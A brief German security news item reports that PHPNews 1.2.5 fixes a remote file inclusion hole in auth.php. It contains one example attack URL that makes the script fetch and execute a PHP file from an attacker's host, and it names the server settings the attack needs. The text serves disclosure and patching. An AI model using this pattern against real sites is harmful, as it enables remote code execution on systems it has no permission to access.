Gefixte PHPNews Version verfĂĽgbar
Die aktuelle Version 1.2.5 von PHPNews schlieĂźt eine File-Injection-Schwachstelle.
Die aktuelle Version 1.2.5 von PHPNews -- eine webbasierte News-Board-Software -- schlieĂźt eine File-Injection-Schwachstelle:
Eingaben ĂĽber den Parameter "?path=xyz" in der Datei "auth.php" werden vor der Verwendung zum Einbinden von Dateien nicht grĂĽndlich genug ĂĽberprĂĽft. Durch http://[Opfer]/[PHPNews-Vezeichniss]/auth.php?path=http://[Angreifer-Datei]/ kann ein Angreifer beispielsweise eigene PHP-Scripte nachladen und ausfĂĽhren lassen. Dieser Fehler tritt nur auf, wenn die Optionen register_globals und allow_url_fopen angeschaltet sind.
Siehe dazu auch:
- PHPNews Downloads vom Hersteller
- PHPNews <= 1.2.4 - Remote File Inclusion auf Bugtraq
- SQL-Injection-LĂĽcke in PHPNews beseitigt